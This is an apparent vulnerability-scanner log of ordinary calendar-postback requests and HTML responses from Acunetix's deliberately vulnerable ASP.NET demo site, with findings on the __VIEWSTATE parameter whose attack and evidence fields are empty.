Request Body - size: 1,131 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8231&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAOKT0WtoIHgJTRBYBBgCAAPb0ZdoIZGRkZH%2FGNfuVmoV1RDSDwCo7AplxXf8%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwKQ4PaYCgK746uPDALtiZ78CwKo4Jb%2FDwKo4Jb%2FDwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc%2BsAwLmnc%2BsAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb%2FQBgLmnb%2FQBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk%2FAvukuT8C%2B6St0gkC%2B6St0gkC%2B6TB9gIC%2B6TB9gIC%2B6T1jQoC%2B6T1jQoC%2B6TpoAMC%2B6TpoAMC%2B6SdxwwC%2B6SdxwwC%2B6TxrAkC%2B6TxrAkC%2B6TlwwIC%2B6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz%2BQ8C3Muz%2BQ9s%2FbVRT%2F%2Bt0x22Rymq0keTzkeOWA%3D%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:32:36 GMT Content-Length: 12462
Response Body - size: 12,462 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAOKT0WtoIHgJTRBYBBgCAAPb0ZdoIZGRkZH/GNfuVmoV1RDSDwCo7AplxXf8=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKQ4PaYCgK746uPDALtiZ78CwKo4Jb/DwKo4Jb/DwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc+sAwLmnc+sAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb/QBgLmnb/QBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk/AvukuT8C+6St0gkC+6St0gkC+6TB9gIC+6TB9gIC+6T1jQoC+6T1jQoC+6TpoAMC+6TpoAMC+6SdxwwC+6SdxwwC+6TxrAkC+6TxrAkC+6TlwwIC+6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz+Q8C3Muz+Q9s/bVRT/+t0x22Rymq0keTzkeOWA==" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:White" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1127 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,127 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8219&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAOKT0WtoIHgJTRBYBBgCAC%2FmGXNoIZGRkggdPgDAH9MYw8pNKnbpsuifJOuk%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwKjp7uNDwK746uPDALtiZ78CwKo4Jb%2FDwKo4Jb%2FDwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc%2BsAwLmnc%2BsAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb%2FQBgLmnb%2FQBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk%2FAvukuT8C%2B6St0gkC%2B6St0gkC%2B6TB9gIC%2B6TB9gIC%2B6T1jQoC%2B6T1jQoC%2B6TpoAMC%2B6TpoAMC%2B6SdxwwC%2B6SdxwwC%2B6TxrAkC%2B6TxrAkC%2B6TlwwIC%2B6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz%2BQ8C3Muz%2BQ%2BsQ4tBBzGek4Tu0zkMZKcJZulQdA%3D%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:57:54 GMT Content-Length: 12462
Response Body - size: 12,462 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAOKT0WtoIHgJTRBYBBgCAC/mGXNoIZGRkggdPgDAH9MYw8pNKnbpsuifJOuk=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKjp7uNDwK746uPDALtiZ78CwKo4Jb/DwKo4Jb/DwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc+sAwLmnc+sAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb/QBgLmnb/QBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk/AvukuT8C+6St0gkC+6St0gkC+6TB9gIC+6TB9gIC+6T1jQoC+6T1jQoC+6TpoAMC+6TpoAMC+6SdxwwC+6SdxwwC+6TxrAkC+6TxrAkC+6TlwwIC+6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz+Q8C3Muz+Q+sQ4tBBzGek4Tu0zkMZKcJZulQdA==" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:White" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1125 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
